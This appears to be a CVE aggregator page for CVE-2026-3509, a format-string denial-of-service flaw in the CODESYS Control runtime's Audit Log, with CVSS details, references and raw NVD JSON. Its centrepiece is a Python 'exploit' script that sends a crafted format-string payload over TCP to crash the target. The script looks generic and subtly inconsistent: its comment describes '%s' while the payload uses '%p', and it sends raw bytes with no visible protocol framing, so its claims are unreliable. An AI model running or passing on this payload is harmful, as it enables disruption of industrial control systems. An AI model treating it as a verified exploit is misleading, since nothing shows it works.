CVE-2026-3509

Description

An unauthenticated remote attacker may be able to control the format string of messages processed by the Audit Log of the CODESYS Control runtime system, potentially resulting in a denial‑of‑service (DoS) condition.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

CODESYS Control Runtime (具体受影响版本请参考厂商公告VDE-2026-018)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-3509: Format String in Audit Log
# Description: Sends a malicious format string payload to the target service.

import socket

def send_exploit(target_ip, target_port):
    # Malicious payload containing format specifiers
    # %s reads from stack, %n writes to memory (likely causing crash)
    payload = b"AAAA%p%p%p%p%n%n%n"
    
    try:
        print(f"[*] Connecting to {target_ip}:{target_port}...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))
        
        print("[*] Sending malicious payload...")
        s.send(payload)
        
        response = s.recv(1024)
        print(f"[+] Received response (might be empty if crashed): {response}")
        s.close()
        print("[+] Exploit packet sent.")
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target IP and Port
    TARGET_IP = "192.168.1.10"
    TARGET_PORT = 1212 
    send_exploit(TARGET_IP, TARGET_PORT)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3509
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3509
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3509/
[4] VulDB https://vuldb.com/cve/CVE-2026-3509
[5] https://certvde.com/de/advisories/VDE-2026-018

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3509", "sourceIdentifier": "[email protected]", "published": "2026-03-24T08:16:01.657", "lastModified": "2026-03-24T15:53:48.067", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated remote attacker may be able to control the format string of messages processed by the Audit Log of the CODESYS Control runtime system, potentially resulting in a denial‑of‑service (DoS) condition."}, {"lang": "es", "value": "Un atacante remoto no autenticado podría controlar la cadena de formato de los mensajes procesados por el Registro de Auditoría del sistema de tiempo de ejecución CODESYS Control, resultando potencialmente en una condición de denegación de servicio (DoS)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-134"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2026-018", "source": "[email protected]"}]}}